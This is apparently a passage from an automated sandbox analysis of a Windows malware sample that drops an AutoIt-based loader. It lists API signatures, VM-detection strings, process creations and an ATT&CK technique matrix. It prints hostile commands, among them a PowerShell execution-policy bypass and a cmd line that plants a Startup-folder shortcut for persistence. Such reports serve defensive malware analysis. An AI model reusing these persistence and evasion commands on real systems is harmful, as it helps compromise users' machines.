Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 4232 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7840Thread sleep count: 5522 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7872Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BC7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF75F1BC7C0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BBC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF75F1BBC70
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BB7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF75F1BB7C0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF75F1C72A8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C71F4 FindFirstFileW,FindClose,0_2_00007FF75F1C71F4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F182F50 FindFirstFileExW,0_2_00007FF75F182F50
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF75F1CA874
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1C6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF75F1C6428
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF75F1CA4F8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1CA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF75F1CA350
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00B64005
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6494A GetFileAttributesW,FindFirstFileW,FindClose,5_2_00B6494A
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00B6C2FF
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_00B6CD9F
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6CD14 FindFirstFileW,FindClose,5_2_00B6CD14
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00B6F5D8
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_00B6F735
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_00B6FA36
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_00B63CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_002B4005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B494A GetFileAttributesW,FindFirstFileW,FindClose,12_2_002B494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_002BC2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BCD14 FindFirstFileW,FindClose,12_2_002BCD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,12_2_002BCD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_002BF5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,12_2_002BF735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002BFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,12_2_002BFA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002B3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,12_2_002B3CE2
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F161D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF75F161D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: Guard.exe, 00000005.00000002.2929941093.0000000004389000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: powershell.exe, 00000003.00000002.1821309242.000001E2CBC95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}t
Source: wscript.exe, 0000000B.00000002.1921257420.000002283AC10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G;
Source: powershell.exe, 00000003.00000002.1820987173.000001E2CBC42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: SwiftWrite.pif, 0000000C.00000002.2930061430.00000000042A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D0A00 BlockInput,0_2_00007FF75F1D0A00
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1437B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF75F1437B0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F165BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF75F165BC0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D7634 LoadLibraryA,GetProcAddress,0_2_00007FF75F1D7634
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1AD868 WaitForSingleObject,UnloadUserProfile,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_00007FF75F1AD868
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1659C8 SetUnhandledExceptionFilter,0_2_00007FF75F1659C8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1657E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75F1657E4
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F17AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF75F17AF58
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F188FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF75F188FE4
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00B2A385
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B2A354 SetUnhandledExceptionFilter,5_2_00B2A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027A354 SetUnhandledExceptionFilter,12_2_0027A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_0027A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_0027A385

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1ACE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00007FF75F1ACE68
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1437B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF75F1437B0
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1B9420 SendInput,keybd_event,0_2_00007FF75F1B9420
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1BD158 mouse_event,0_2_00007FF75F1BD158
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exitJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1AC858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00007FF75F1AC858
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1AD540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00007FF75F1AD540
Source: EO3RT0fEfb.exe, Guard.exe.1.dr, SwiftWrite.pif.5.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: EO3RT0fEfb.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F17FD20 cpuid 0_2_00007FF75F17FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F17BEF8 GetSystemTimeAsFileTime,0_2_00007FF75F17BEF8
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1A2BCF GetUserNameW,0_2_00007FF75F1A2BCF
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F182650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00007FF75F182650
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F161D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF75F161D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: powershell.exe, 00000003.00000002.1820987173.000001E2CBC63000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1821309242.000001E2CBC95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /C:\Users\Public\Guard.exe
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B38B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000005.00000002.2928255001.0000000001768000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B38B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000003.00000002.1821309242.000001E2CBC7F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820299057.000001E2CB9F7000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000003.1809250000.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000005.00000003.1805201580.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000005.00000003.1800455120.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000005.00000003.1805017731.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000005.00000003.1809445323.0000000004E61000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000005.00000003.1804782149.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000005.00000003.1804671592.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000005.00000003.1796412809.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000005.00000003.1792759406.0000000004F60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: Guard.exe, 00000005.00000002.2928765644.0000000003BAC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7pC:\Users\Public\Guard.exe
Source: EO3RT0fEfb.exe, 00000000.00000002.1741781373.0000020B9F862000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1820987173.000001E2CBC63000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1792733359.000001E2B38B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1792733359.000001E2B36D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1821309242.000001E2CBC95000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000005.00000002.2928070330.000000000144F000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2928070330.000000000143F000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 00000005.00000002.2929941093.00000000043D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000003.00000002.1792733359.000001E2B38B8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: powershell.exe, 00000003.00000002.1821309242.000001E2CBC95000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Users\Public\Guard.exe
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: EO3RT0fEfb.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: SwiftWrite.pif.5.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00007FF75F1D4074
Source: C:\Users\user\Desktop\EO3RT0fEfb.exeCode function: 0_2_00007FF75F1D3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00007FF75F1D3940
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B7696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,5_2_00B7696E
Source: C:\Users\Public\Guard.exeCode function: 5_2_00B76E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00B76E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002C696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,12_2_002C696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 12_2_002C6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_002C6E32
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
2
Native API
1
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
12
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
1
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager2
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS26
System Information Discovery
Distributed Component Object ModelInput Capture22
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
311
Masquerading
LSA Secrets41
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials21
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Virtualization/Sandbox Evasion
DCSync3
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
